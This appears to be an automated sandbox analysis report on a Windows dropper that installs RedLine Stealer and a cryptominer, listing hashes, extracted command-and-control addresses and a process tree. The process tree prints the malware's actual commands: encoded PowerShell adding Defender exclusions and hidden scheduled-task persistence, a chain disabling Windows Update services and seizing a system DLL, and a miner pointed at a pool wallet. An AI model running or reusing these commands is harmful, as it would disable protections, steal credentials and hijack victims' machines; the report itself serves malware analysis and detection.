Analysis
-
max time kernel
84s -
max time network
150s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
13-11-2022 17:15
Static task
static1
General
-
Target
b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
-
Size
173KB
-
MD5
c87dcd21b0dcb51699a4735ac76ad3de
-
SHA1
87d3d0a8aca200fc85ac9646b710141a4098932b
-
SHA256
b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057
-
SHA512
bba293557550219edcb37d8fc88d366ff53164e6018beb20f4ecc4f72cc58afae0e8573449602b48a89db916b7643dd9b30d5767c37dcf0d8893cd57f9dfa8e8
-
SSDEEP
3072:C0lrFhKhmLqTNZZ/DRoz6bisK6XCE/gUumfWTa/7Oj:n7LqTNZF0AisKOVPA
Malware Config
Extracted
redline
123
78.153.144.3:2510
-
auth_value
cd6abb0af211bce081d7bf127cc26835
Extracted
redline
new1113
jalocliche.xyz:81
chardhesha.xyz:81
-
auth_value
bce8d71b3146db7b78f06ec6ae28bdd9
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/4128-296-0x00000000024F0000-0x000000000252E000-memory.dmp family_redline behavioral1/memory/4128-310-0x0000000004B40000-0x0000000004B7C000-memory.dmp family_redline behavioral1/memory/4752-788-0x0000000004FD21CA-mapping.dmp family_redline behavioral1/memory/4752-825-0x0000000004FB0000-0x0000000004FD8000-memory.dmp family_redline behavioral1/memory/3860-1093-0x00000000002921AE-mapping.dmp family_redline behavioral1/memory/1096-1097-0x0000000000C20000-0x0000000000C59000-memory.dmp family_redline behavioral1/memory/1096-1120-0x0000000000C20000-0x0000000000C59000-memory.dmp family_redline -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
918.exe1176.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe2126.exeLYKAA.exe26F4.exe3DF7.exeminer2.exe4376.exepid process 1096 918.exe 3488 1176.exe 1324 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe 752 2126.exe 508 LYKAA.exe 4128 26F4.exe 5040 3DF7.exe 5052 miner2.exe 1788 4376.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 4968 takeown.exe 3868 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/4112-909-0x0000000000400000-0x0000000000BEB000-memory.dmp upx behavioral1/memory/4112-920-0x0000000000400000-0x0000000000BEB000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
pid process 2952 -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 4968 takeown.exe 3868 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 74 ip-api.com -
Suspicious use of SetThreadContext 2 IoCs
Processes:
LYKAA.exe4376.exedescription pid process target process PID 508 set thread context of 4808 508 LYKAA.exe vbc.exe PID 1788 set thread context of 4752 1788 4376.exe vbc.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 4784 sc.exe 3416 sc.exe 4916 sc.exe 3080 sc.exe 3424 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4364 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 81 Go-http-client/1.1 -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 416 reg.exe 4060 reg.exe 1444 reg.exe 4208 reg.exe 4528 reg.exe 3376 reg.exe 2396 reg.exe 4716 reg.exe 2880 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exepid process 328 b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe 328 b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2952 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exepid process 328 b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 2952 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe2126.exe26F4.exeminer2.exepowershell.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1324 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeDebugPrivilege 508 LYKAA.exe Token: SeDebugPrivilege 752 2126.exe Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeDebugPrivilege 4128 26F4.exe Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeDebugPrivilege 5052 miner2.exe Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeDebugPrivilege 2384 powershell.exe Token: SeIncreaseQuotaPrivilege 2384 powershell.exe Token: SeSecurityPrivilege 2384 powershell.exe Token: SeTakeOwnershipPrivilege 2384 powershell.exe Token: SeLoadDriverPrivilege 2384 powershell.exe Token: SeSystemProfilePrivilege 2384 powershell.exe Token: SeSystemtimePrivilege 2384 powershell.exe Token: SeProfSingleProcessPrivilege 2384 powershell.exe Token: SeIncBasePriorityPrivilege 2384 powershell.exe Token: SeCreatePagefilePrivilege 2384 powershell.exe Token: SeBackupPrivilege 2384 powershell.exe Token: SeRestorePrivilege 2384 powershell.exe Token: SeShutdownPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeSystemEnvironmentPrivilege 2384 powershell.exe Token: SeRemoteShutdownPrivilege 2384 powershell.exe Token: SeUndockPrivilege 2384 powershell.exe Token: SeManageVolumePrivilege 2384 powershell.exe Token: 33 2384 powershell.exe Token: 34 2384 powershell.exe Token: 35 2384 powershell.exe Token: 36 2384 powershell.exe Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 2952 Token: SeCreatePagefilePrivilege 2952 Token: SeShutdownPrivilege 1872 powercfg.exe Token: SeCreatePagefilePrivilege 1872 powercfg.exe Token: SeShutdownPrivilege 4816 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1176.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.execmd.exeLYKAA.execmd.exe2126.exeminer2.exedescription pid process target process PID 2952 wrote to memory of 1096 2952 918.exe PID 2952 wrote to memory of 1096 2952 918.exe PID 2952 wrote to memory of 1096 2952 918.exe PID 2952 wrote to memory of 3488 2952 1176.exe PID 2952 wrote to memory of 3488 2952 1176.exe PID 3488 wrote to memory of 1324 3488 1176.exe EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe PID 3488 wrote to memory of 1324 3488 1176.exe EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe PID 1324 wrote to memory of 4596 1324 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe cmd.exe PID 1324 wrote to memory of 4596 1324 EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe cmd.exe PID 4596 wrote to memory of 4364 4596 cmd.exe timeout.exe PID 4596 wrote to memory of 4364 4596 cmd.exe timeout.exe PID 2952 wrote to memory of 752 2952 2126.exe PID 2952 wrote to memory of 752 2952 2126.exe PID 2952 wrote to memory of 752 2952 2126.exe PID 4596 wrote to memory of 508 4596 cmd.exe LYKAA.exe PID 4596 wrote to memory of 508 4596 cmd.exe LYKAA.exe PID 2952 wrote to memory of 4128 2952 26F4.exe PID 2952 wrote to memory of 4128 2952 26F4.exe PID 2952 wrote to memory of 4128 2952 26F4.exe PID 508 wrote to memory of 4208 508 LYKAA.exe cmd.exe PID 508 wrote to memory of 4208 508 LYKAA.exe cmd.exe PID 4208 wrote to memory of 4928 4208 cmd.exe schtasks.exe PID 4208 wrote to memory of 4928 4208 cmd.exe schtasks.exe PID 2952 wrote to memory of 5040 2952 3DF7.exe PID 2952 wrote to memory of 5040 2952 3DF7.exe PID 752 wrote to memory of 5052 752 2126.exe miner2.exe PID 752 wrote to memory of 5052 752 2126.exe miner2.exe PID 2952 wrote to memory of 1788 2952 4376.exe PID 2952 wrote to memory of 1788 2952 4376.exe PID 2952 wrote to memory of 1788 2952 4376.exe PID 2952 wrote to memory of 1112 2952 explorer.exe PID 2952 wrote to memory of 1112 2952 explorer.exe PID 2952 wrote to memory of 1112 2952 explorer.exe PID 2952 wrote to memory of 1112 2952 explorer.exe PID 2952 wrote to memory of 2268 2952 explorer.exe PID 2952 wrote to memory of 2268 2952 explorer.exe PID 2952 wrote to memory of 2268 2952 explorer.exe PID 5052 wrote to memory of 2384 5052 miner2.exe powershell.exe PID 5052 wrote to memory of 2384 5052 miner2.exe powershell.exe PID 2952 wrote to memory of 1368 2952 explorer.exe PID 2952 wrote to memory of 1368 2952 explorer.exe PID 2952 wrote to memory of 1368 2952 explorer.exe PID 2952 wrote to memory of 1368 2952 explorer.exe PID 2952 wrote to memory of 3864 2952 explorer.exe PID 2952 wrote to memory of 3864 2952 explorer.exe PID 2952 wrote to memory of 3864 2952 explorer.exe PID 2952 wrote to memory of 3348 2952 explorer.exe PID 2952 wrote to memory of 3348 2952 explorer.exe PID 2952 wrote to memory of 3348 2952 explorer.exe PID 2952 wrote to memory of 3348 2952 explorer.exe PID 2952 wrote to memory of 3692 2952 explorer.exe PID 2952 wrote to memory of 3692 2952 explorer.exe PID 2952 wrote to memory of 3692 2952 explorer.exe PID 2952 wrote to memory of 3692 2952 explorer.exe PID 2952 wrote to memory of 436 2952 explorer.exe PID 2952 wrote to memory of 436 2952 explorer.exe PID 2952 wrote to memory of 436 2952 explorer.exe PID 2952 wrote to memory of 436 2952 explorer.exe PID 2952 wrote to memory of 4076 2952 explorer.exe PID 2952 wrote to memory of 4076 2952 explorer.exe PID 2952 wrote to memory of 4076 2952 explorer.exe PID 2952 wrote to memory of 4900 2952 explorer.exe PID 2952 wrote to memory of 4900 2952 explorer.exe PID 2952 wrote to memory of 4900 2952 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe"C:\Users\Admin\AppData\Local\Temp\b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\918.exeC:\Users\Admin\AppData\Local\Temp\918.exe1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1176.exeC:\Users\Admin\AppData\Local\Temp\1176.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp154D.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 65⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵
-
C:\Users\Admin\AppData\Local\Temp\2126.exeC:\Users\Admin\AppData\Local\Temp\2126.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\miner2.exe"C:\Windows\Temp\miner2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
-
C:\Users\Admin\AppData\Local\Temp\26F4.exeC:\Users\Admin\AppData\Local\Temp\26F4.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3DF7.exeC:\Users\Admin\AppData\Local\Temp\3DF7.exe1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\4376.exeC:\Users\Admin\AppData\Local\Temp\4376.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
